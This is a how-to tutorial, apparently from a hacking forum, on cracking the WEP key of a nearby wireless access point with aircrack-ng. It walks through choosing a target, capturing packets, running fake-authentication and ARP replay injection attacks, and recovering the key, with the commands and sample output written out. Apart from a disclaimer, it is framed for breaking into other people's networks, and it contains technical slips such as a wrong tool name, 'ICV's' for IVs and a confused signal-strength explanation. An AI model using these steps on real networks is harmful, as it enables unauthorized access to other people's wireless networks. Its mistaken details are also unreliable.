Cracking WEP with the aircrack-ng suite

Prerequisites: 

Linux CMD experience
Backtrack 4 R2 or Ubuntu 7.10 + patched WiFi Drivers + Aircrack-ng suite
common sense

The information in this tutorial is for educational and informational purposes only, use it at your own risk. Soldierx.com, it's members, crew, and affiliates cannot be held responsible for the misuse of this information.

WEP encryption has been hailed as one of the least secure methods of securing a wireless access point in the history of WiFi since wireless encryption standards began being developed. The main reason for this is that fragments of the key are sent between a client computer and the access point in 32bit initialization vectors commonly referred to as ICV's. Statistically it has been shown that a certain volume of these have weak encryption and are vulnerable to packet analysis. The number of packets required to crack an access point's key can vary from 200 to 500 thousand for 64 and 128 bit encryption respectively.

***NOTE***
**This Tutorial will cover a basic WEP crack
**It is by no means exhaustive and is meant for
**A jumping off point, from here I send you to Google
**The place where I first got my information.
**********

***ALL COMMANDS LISTED IN THIS TUTORIAL ARE BING RUN FROM THE root ACCOUNT ON THE MACHINE, IF YOU ARE NOT RUNNING BACKTRACK OR YOU BUILT YOUR OWN SYSTEM YOU NEED TO LOG IN AS ROOT OR sudo EACH COMMAND***

The first step in any cracker's attempt at a WiFi access point is to pick a target. This can be achieved by running airmon-ng to list any and all available network adapters.

 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Then you want to type airodump-ng start (adapter name: ath0, wlan0, wlan1, etc) What this does is put you wireless adapter into promiscuous or monitor mode which allows it to accept all traffic and basically grab ARP packets and such from out of the air, it also allows tha adapter to do what is called packet injection, basically shooting packets into the network to get a response from the Access point. The next command to run is airodump-ng (adapter name: mon0, mon1, eth0, etc.) this will list all available access points and let you choose one. you will want to pick one with the best signal. The way to check what the best signal is is to look at the pwr column while the program is running. a strong signal will be a low number preceded by a dash (-) such as -56 or -86. The First example would be the stronger one as I believe the strength is measured in -dBm or the power ratio in decibels (dB) of the measured power referenced to one milliwatt. the lower number being stronger as you get more towards a positive output of power.

 CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25
                                                                                                             
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                           
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                          
                                                                                                           
 BSSID              STATION            PWR  Lost  Packets  Probes                                            
                                                                                                           
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  

Once you have selected your target, make note of the BSSID, Channel, and the amount of data it recieves. Another good indicator of a good accesspoint to crack would be a reasonable amount of data recieved (80-120 without injection, can be more). You would then run the command airodump-ng -w filename --channel (channel of target) --bssid (bssid or MAC address of target) (interface to capture on, mon0, eth0, whatever airmon gives you as the monitor mode interface typically mon0)

Example:

airodump-ng -w output --channel 9 --bssid 00:14:6C:7E:40:80 ath0

At this stage you would then open a tab in your console window for a separate session and run aireplay-ng -1 0 -a (bssid of target) (interface) this is a fake authentication attack and will give you something like this:

18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful Smile

if you are successful. once you have achieved a successful association then you run the injection to gather data. (you want to run this alongside airodump-ng because airodump captures and dumps packets to a .cap file that you will be running through aircrack-ng). To set the attack we will be running this command aireplay-ng -3 -b (bssid of target) (interface) . This command starts an ARP request replay attack which will stimulate the gathering of data that you need to crack the access point with.

Example:

aireplay-ng -3 -b 00:14:6C:7E:40:80 ath0

You Should see this:

Saving ARP requests in replay_arp-0321-191525.cap
 You should also start airodump-ng to capture replies.
 Read 629399 packets (got 316283 ARP requests), sent 210955 packets...

open another console window, a third one, and enter aircrack-ng filename.cap and aricrack will attempt a crack with what you have captured, and if it does not succeed it will monitor the amount of data you have recieved and continue trying to crack the key at regular intervals. once the crack has succeeded you will know it by a screen that has this:

                                              Aircrack-ng 0.9
 
 
                              [00:03:06] Tested 674449 keys (got 96610 IVs)
 
 KB    depth   byte(vote)
  0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0)
  1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12)
  2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10)
  3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15)
 
                       KEY FOUND! [ 12:34:56:78:90 ]
      Probability: 100%

this screen will let you know that you have successfully cracked the key and you can copy it down to use or test. you cn backup the .cap files to a flash drive and crack at a later date if you lose the key. though if the access point's key changes you may have to crack it again.

This is all that is really needed to know to crack a WEP encrypted access point.